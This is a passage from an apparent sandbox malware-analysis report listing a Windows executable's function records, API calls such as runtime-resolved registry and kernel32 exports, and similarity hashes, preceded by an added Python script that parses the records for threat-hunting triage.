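The record above, and the RegDeleteKeyTransactedW record further down, show the same two-call stub: GetModuleHandleW for Advapi32.dll followed by GetProcAddress for a named export, so the transacted registry API never appears in the PE's static import table and only shows up in a function listing like this one. As an added example that is not part of the Joe Sandbox report or of the sample's code, the script below parses these function records in the form they take on this page and pulls out (a) the imports resolved at runtime, (b) the resolved strings per function, and (c) functions that share an API-ID hash, i.e. the same call profile. The input is constructed from three records on this page (the wsprintfW record and the two GetProcAddress records) with the "Associated:" lines dropped; the record fields and helper names are this script's own assumptions, not Joe Sandbox's.

```python
"""Triage helper for Joe Sandbox function-level records (added example, not report code)."""
import re
from collections import defaultdict

# Constructed input: three records copied from the report page, "Associated:" lines omitted.
SAMPLE = """\
APIs
• __EH_prolog3_GS.LIBCMT ref: 0043FBFD
  • Part of subcall function 00417579: __EH_prolog3_GS.LIBCMT ref: 00417583
• wsprintfW.USER32 ref: 0043FC3F
• wvsprintfW.USER32(?,?,00000000), ref: 0043FC5A
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: H_prolog3_$ErrorFreeLastString$wsprintfwvsprintf
• String ID: %d: %s
• API String ID: 244791219-204819183
• Opcode ID: c6aa90fd246b48e40723a5880c24c4db7e7b03834f27aec6cc7b718825f7c7da
APIs
• GetModuleHandleW.KERNEL32(Advapi32.dll,?,?,00421B3C,?,?,00000000,?,?,?,?,?,?), ref: 0042A59C
• GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedW), ref: 0042A5AC
Strings
Similarity
• API ID: AddressHandleModuleProc
• String ID: Advapi32.dll$RegCreateKeyTransactedW
• API String ID: 1646373207-2994018265
• Opcode ID: 1a8a3d637dfd505bb417a7343b352d1ef99116b66e455568e02bca749859dc77
APIs
• GetModuleHandleW.KERNEL32(Advapi32.dll,?,?,?,00431978,?,?), ref: 00432103
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 00432113
Strings
Similarity
• API ID: AddressHandleModuleProc
• String ID: Advapi32.dll$RegDeleteKeyTransactedW
• API String ID: 1646373207-2168864297
• Opcode ID: 138fe6eebc37b519882cce5f69771769fb2abe975d68e260da15818f94720a6d
"""

# One API call line: optional "Part of subcall function XXXXXXXX:" prefix,
# Name.MODULE, optional "(args)", then "ref: <address>".
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<parent>[0-9A-F]{8}): )?"
    r"(?P<name>[\w@]+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})$"
)
# Key/value lines of the Similarity and Memory Dump Source sections.
FIELD_RE = re.compile(
    r"^•\s*(?P<key>API ID|String ID|API String ID|Opcode ID|Instruction ID|"
    r"Opcode Fuzzy Hash|Instruction Fuzzy Hash|Source File):\s*(?P<value>.*)$"
)
HEX8_RE = re.compile(r"[0-9A-F]{8}")


def parse_records(text):
    """Split report text into one dict per function block; a block starts at an 'APIs' line."""
    records, rec = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            rec = {"apis": [], "fields": {}}
            records.append(rec)
            continue
        if rec is None or not line.startswith("•"):
            continue
        m = FIELD_RE.match(line)
        if m:
            rec["fields"][m["key"]] = m["value"]
            continue
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            rec["apis"].append({"name": m["name"], "module": m["module"], "args": args,
                                "ref": m["ref"], "subcall_of": m["parent"]})
    for rec in records:
        sid = rec["fields"].get("String ID", "")
        rec["strings"] = sid.split("$") if sid else []          # '$' separates strings
        asid = rec["fields"].get("API String ID", "")
        rec["api_id_hash"], _, rec["string_id_hash"] = asid.partition("-")
    return records


def _is_symbolic(arg):
    """True for an argument the sandbox resolved to a name/string, not '?' or a raw 8-hex-digit value."""
    return arg not in ("", "?") and not HEX8_RE.fullmatch(arg)


def dynamic_imports(records):
    """Return {(module, export)} pairs resolved at runtime: module from the most recent
    GetModuleHandle*/LoadLibrary* argument, export from the 2nd GetProcAddress argument."""
    found = set()
    for rec in records:
        module = None
        for call in rec["apis"]:
            if call["subcall_of"]:
                continue  # follow only the function's own calls, not its callees'
            args = call["args"]
            if call["name"].startswith(("GetModuleHandle", "LoadLibrary")) and args and _is_symbolic(args[0]):
                module = args[0]
            elif call["name"] == "GetProcAddress" and len(args) > 1 and _is_symbolic(args[1]):
                found.add((module or "<unknown>", args[1]))
    return found


def group_by_api_id(records):
    """Map API-ID hash -> opcode IDs of the functions sharing that call profile."""
    groups = defaultdict(list)
    for rec in records:
        if rec["api_id_hash"]:
            groups[rec["api_id_hash"]].append(rec["fields"].get("Opcode ID", "?"))
    return dict(groups)


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for mod, export in sorted(dynamic_imports(recs)):
        print(f"resolved at runtime: {mod}!{export}")
    for api_id, opcodes in group_by_api_id(recs).items():
        print(f"API ID {api_id}: {len(opcodes)} function(s)")
```

Run it against the full report text instead of SAMPLE to get every export the sample resolves by name; those names are the ones to look for in the import-table view, where they will be absent, and in hunting rules, where a GetProcAddress string argument is a more stable indicator than the surrounding opcode bytes.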

APIs
• __EH_prolog3.LIBCMT ref: 0040C38B
• GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
• SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$H_prolog3
• String ID: HsG
• API String ID: 3502553090-1835203436
• Opcode ID: ec58ad405b01f467ccf8307f0ab561f767984d1bac89d2cc34c2c45f892433a3
• Instruction ID: 981eb43e0fddc467d5235909099b20ba7bcbfd9755a1045d248edb3a33cea4bd
• Opcode Fuzzy Hash: ec58ad405b01f467ccf8307f0ab561f767984d1bac89d2cc34c2c45f892433a3
• Instruction Fuzzy Hash: B7014871910602EBD700DF69C98965DBBF4BF08314F15C26BE448AB791C7B8E950DF88
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(Advapi32.dll,?,?,?,00431978,?,?), ref: 00432103
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 00432113
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: AddressHandleModuleProc
• String ID: Advapi32.dll$RegDeleteKeyTransactedW
• API String ID: 1646373207-2168864297
• Opcode ID: 138fe6eebc37b519882cce5f69771769fb2abe975d68e260da15818f94720a6d
• Instruction ID: abd84a48a6fd0def730c30cb06d7162be0f692238ad8e864dc2c0e7cc89314fe
                                                                                                                                                                          • Opcode Fuzzy Hash: 138fe6eebc37b519882cce5f69771769fb2abe975d68e260da15818f94720a6d
                                                                                                                                                                          • Instruction Fuzzy Hash: 2DF0A732204605BB8B211F669E08E5BFBEEFBD9B72B11943BF7C9D1010D6758441CB68
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 0040C50C
• GetLastError.KERNEL32(00000004,0040C76A,00000000,?,00000000,00000000,00000004,0040F0CB,?,00000000,?,00000001,00000044,0040EF7A,0047C4E4,?), ref: 0040C52E
• SetLastError.KERNEL32(?,00000000,?,00000000,?,0040EECA,00000000,?,?,00000000,?,0040E94F,?), ref: 0040C572
Strings
Similarity
• API ID: ErrorLast$H_prolog3
• String ID: HsG
• API String ID: 3502553090-1835203436
• Opcode ID: bb35c17c1ace0882dc611001748745e53e58e5976201403884a6f50121b6237c
• Instruction ID: 1ec89a7edc89e944a9e5ffbe6c393f063bdecd5f1924381b65c01bb3cce8ef58
• Opcode Fuzzy Hash: bb35c17c1ace0882dc611001748745e53e58e5976201403884a6f50121b6237c
• Instruction Fuzzy Hash: 2F016971800646EFCB01DF58C948689BFB1FF08314F11826AF8189B692C7B4EA50DF84
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 0040C48E
• GetLastError.KERNEL32(00000004,0040C71D,00000000,?,00000000,00000004,0040F729,-00000004,?,00000001,?,00000000), ref: 0040C4B0
• SetLastError.KERNEL32(?,00000000,?), ref: 0040C4F1
Strings
Similarity
• API ID: ErrorLast$H_prolog3
• String ID: HsG
• API String ID: 3502553090-1835203436
• Opcode ID: 8fc513fe5c2de92c2321a02493d8acea480801458b836c3d458e046534d1c024
• Instruction ID: ead6c2944030e3329fa535a29eb94df9cd90448a4718b737bfb3a6f6df8be5f3
• Opcode Fuzzy Hash: 8fc513fe5c2de92c2321a02493d8acea480801458b836c3d458e046534d1c024
• Instruction Fuzzy Hash: A10148B1900646EFCB01DF58C989A9DBBF0FF08314F11C26AF4189B651C7B4AA50DF88
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 0041C259
• GetLastError.KERNEL32(00000004,0041B346,00000001,00000000,?,00000000,00000040,0041D5DF,00000004,00000000,?,00000000,00000000,0000003C,0041D56E,00000004), ref: 0041C27B
• SetLastError.KERNEL32(?,?,00000000,?,?,00000000,00000000,0000003C,0041D56E,00000004,0000007B,0000003C,0041CB54,?,?,00000001), ref: 0041C2B5
Strings
Similarity
• API ID: ErrorLast$H_prolog3
• String ID: HsG
• API String ID: 3502553090-1835203436
• Opcode ID: 5eeb9ab5060062e095ece73b8a1a43d1b00dbf21c597526fd3edec0e9881c4de
• Instruction ID: 79dcfcdfb1828f904c63e7600ba55bbe821edd839d2013e20bdec51be1a01b63
• Opcode Fuzzy Hash: 5eeb9ab5060062e095ece73b8a1a43d1b00dbf21c597526fd3edec0e9881c4de
• Instruction Fuzzy Hash: 19017C71800646EFCB01DF58C94869CBFB1FF08314F11C25AF4589B662C7B4AA60DF88
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 00416D3D
• GetLastError.KERNEL32(00000004,00416D04,00000000,00000001,00000000,?,00000001,0000006C,00417625,?,?,.ini,?,%ld,?), ref: 00416D5F
• SetLastError.KERNEL32(?,?), ref: 00416D93
Strings
Similarity
• API ID: ErrorLast$H_prolog3
• String ID: HsG
• API String ID: 3502553090-1835203436
• Opcode ID: b33733fb8619fa10b6a356054a6a928c2e3ea7b251832d07473f2f73712f81ce
• Instruction ID: 8956a3ec6d2ca124da9afe2835117fd3776a50f9ee80aa5e13b8ad628144bee9
• Opcode Fuzzy Hash: b33733fb8619fa10b6a356054a6a928c2e3ea7b251832d07473f2f73712f81ce
• Instruction Fuzzy Hash: 98014B70900656EFC701DF69C549698BFF1FF08318F15C26AE4589BAA2C7B4AA50DF88
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 00433438
• GetLastError.KERNEL32(00000004,00433246,00000000,00000001,?,0000006C,0043432D,?,00000000,00479DF8,?,00479DF8,00000000,00000001,00000000,00000001), ref: 0043345A
• SetLastError.KERNEL32(?,?), ref: 0043348E
Strings
Similarity
• API ID: ErrorLast$H_prolog3
• String ID: HsG
• API String ID: 3502553090-1835203436
• Opcode ID: 851d96114caab5a466079463647a98f3391b0d9cb89e6e7bf710273556ab4542
• Instruction ID: 04a142ce2919f2a2a9e34600752f1ca6ae56aef052629c6f78d6974c90cb667c
• Opcode Fuzzy Hash: 851d96114caab5a466079463647a98f3391b0d9cb89e6e7bf710273556ab4542
• Instruction Fuzzy Hash: ED014B70900646EFD701DF69C509658BFB1FF08318F15C26AF4589B662C7B4AA54DF88
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,GetProcessId,?,00457D5A,?), ref: 00456EF5
• GetProcAddress.KERNEL32(00000000), ref: 00456EFC
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetProcessId$kernel32.dll
• API String ID: 1646373207-399901964
• Opcode ID: 1730a65b3115402ae97b5297904e8f5a402d3da4e57fc197ac9186e856ff9645
• Instruction ID: c09d09f3c34abadc8d80d0c9b07fe9cff1ef65861fe8313c3bf41c7c6f635d83
• Opcode Fuzzy Hash: 1730a65b3115402ae97b5297904e8f5a402d3da4e57fc197ac9186e856ff9645
• Instruction Fuzzy Hash: C5D012722446097BDF103FF5BC0DD6A3B5DDA40A623554436F50DC1152DA79C550975C
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(kernel32.dll,SetDefaultDllDirectories,?,0043AE99,runprerequisites,00000000,00000000,00000000,?), ref: 00439164
• GetProcAddress.KERNEL32(00000000), ref: 0043916B
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: AddressHandleModuleProc
• String ID: SetDefaultDllDirectories$kernel32.dll
• API String ID: 1646373207-2102062458
• Opcode ID: ce868e3f7e211d78d939585cbe7dcad43f2727169a33bf9ad23cd38a1499c266
• Instruction ID: 6f65e85fbc7817077e697e109dbb7edaa7f436e34563800ad968d516eb844be3
• Opcode Fuzzy Hash: ce868e3f7e211d78d939585cbe7dcad43f2727169a33bf9ad23cd38a1499c266
• Instruction Fuzzy Hash: D2C0122134021226DA6027B42C0DB9719499B09A62B56406AB10DE1281CDB8CC404798
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0041520B
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
• _wcsncpy.LIBCMT ref: 0041532F
• _memmove.LIBCMT ref: 004153BE
• _memmove.LIBCMT ref: 004153E3
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorFreeLastString_memmove$H_prolog3__wcsncpy
• String ID:
• API String ID: 127149598-0
• Opcode ID: 81cc97137daa34a53d89da4b4518bfc4a37484b26224423c17e63f71e04ad695
• Instruction ID: d786ea617fbb343e346c3fd2af9d8db9753902622bade768ea54d7db4bbabdaf
• Opcode Fuzzy Hash: 81cc97137daa34a53d89da4b4518bfc4a37484b26224423c17e63f71e04ad695
• Instruction Fuzzy Hash: 0C519F71900719DBDB24DF64CC91BEEB775BF40304F1482AEE419A7281EBB85A88CF59
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00433513
  • Part of subcall function 004334DE: __EH_prolog3.LIBCMT ref: 004334E5
  • Part of subcall function 0040C2BB: __EH_prolog3.LIBCMT ref: 0040C2C2
  • Part of subcall function 004432A1: _malloc.LIBCMT ref: 004432B9
• GetModuleFileNameW.KERNEL32(00000000,?,00000400,00483E18,?,00000001), ref: 00433674
• _memset.LIBCMT ref: 00433715
• _memset.LIBCMT ref: 0043372D
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: H_prolog3_memset$FileH_prolog3_ModuleName_malloc
• String ID:
• API String ID: 1040074069-0
• Opcode ID: dcb6e64cd704c0734b384761993b6c0215855e08e5d3571194c83f5fe99a920b
• Instruction ID: 65642fd5371ddb9317ab123f19c9b813accfdf8c43ab9978d307675438de2c1b
• Opcode Fuzzy Hash: dcb6e64cd704c0734b384761993b6c0215855e08e5d3571194c83f5fe99a920b
• Instruction Fuzzy Hash: FE61B1B0904748DED720DF69C8857DAFBE4BF18304F5084AED09EA3281DB786A45CB99
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0040EFAA
• _strlen.LIBCMT ref: 0040EFD7
• MultiByteToWideChar.KERNEL32(00000008,00000000,?,00000001,00000000,00000000,00000044,0040EF7A,0047C4E4,?,00000000,00000008,00000040,invalid string position,?,0040EECA), ref: 0040EFF0
• MultiByteToWideChar.KERNEL32(00000008,00000000,?,00000000,00000000,00000000,?,0040EECA,00000000,?,?,00000000,?,0040E94F,?), ref: 0040F01E
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ByteCharMultiWide$H_prolog3__strlen
• String ID:
• API String ID: 708778256-0
• Opcode ID: 677c701de312e3921c8341d148b828ccc9366b1273f23519a3fbc29b4dd4de3c
• Instruction ID: e7ae71468cb72755f7a4bce908d9373b338d6ab3cb70ae690776c1224aa6debc
• Opcode Fuzzy Hash: 677c701de312e3921c8341d148b828ccc9366b1273f23519a3fbc29b4dd4de3c
• Instruction Fuzzy Hash: A441EAB1900214ABDB14EFA9CC85EEE7778AF45324F10423EF911B72D2DB785D458B68
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: String$Free$H_prolog3_
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 332078091-0
                                                                                                                                                                          • Opcode ID: a17125eaaa028eb5d9674080e9b5322beb4c0e092eb0de1914406c73cb5bc084
                                                                                                                                                                          • Instruction ID: 99f2c5ddd7081a6fbebd99e35a655f583edc5eddb2a77b826fe2f5043d8735b3
                                                                                                                                                                          • Opcode Fuzzy Hash: a17125eaaa028eb5d9674080e9b5322beb4c0e092eb0de1914406c73cb5bc084
                                                                                                                                                                          • Instruction Fuzzy Hash: 74517B70D042199FDB24DFA4C881BDEBBB0BF04314F24819EE965A72E2DB785A85CF54
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0043DD51
                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,00000044,0043DD41,?,00000000,?,?,?,?), ref: 0043DD98
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0043DDA5
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 0043DE1F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseCreateErrorFileH_prolog3_HandleLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3060235777-0
                                                                                                                                                                          • Opcode ID: b3c695aa09ccd2aac34e94e80b9c082afec2c1a732ca84e708b2a0db9c71e217
                                                                                                                                                                          • Instruction ID: 2badafb05afdb6c4757f28fbead458158b0e9df19cf42f72c0585eb2fc060204
                                                                                                                                                                          • Opcode Fuzzy Hash: b3c695aa09ccd2aac34e94e80b9c082afec2c1a732ca84e708b2a0db9c71e217
                                                                                                                                                                          • Instruction Fuzzy Hash: 1231A070E002549FEB24DFA5D845BAEBBB5EF48718F14402EF8416B2D1D7799C02CB58
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0042FBE4
                                                                                                                                                                            • Part of subcall function 0042F5A4: __EH_prolog3_GS.LIBCMT ref: 0042F5AB
                                                                                                                                                                            • Part of subcall function 0042F5A4: IsWindow.USER32(?), ref: 0042F5F1
                                                                                                                                                                            • Part of subcall function 0042F5A4: SendMessageW.USER32(?,00001061,?,00000008), ref: 0042F606
                                                                                                                                                                          • SendMessageW.USER32(?,0000101E,00000000,000000FE), ref: 0042FCBA
                                                                                                                                                                          • SendMessageW.USER32(?,00001036,00000000,00000020), ref: 0042FCD3
                                                                                                                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0042FCE1
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$H_prolog3_$Window
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1329796335-0
                                                                                                                                                                          • Opcode ID: 18c6e8b82b777e10afadd5bf395ae3e56be81eb9d655a24e07091cc1faab51d1
                                                                                                                                                                          • Instruction ID: bb494f6ecf274b54534cb3e8cba0565adfd70530a530d39ab3d3f46829ffe89c
                                                                                                                                                                          • Opcode Fuzzy Hash: 18c6e8b82b777e10afadd5bf395ae3e56be81eb9d655a24e07091cc1faab51d1
                                                                                                                                                                          • Instruction Fuzzy Hash: 8831DE31B00224ABCB11DF51DD51AEEBBB4AF05750F94003EF9457B2D1C7785845CB58
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
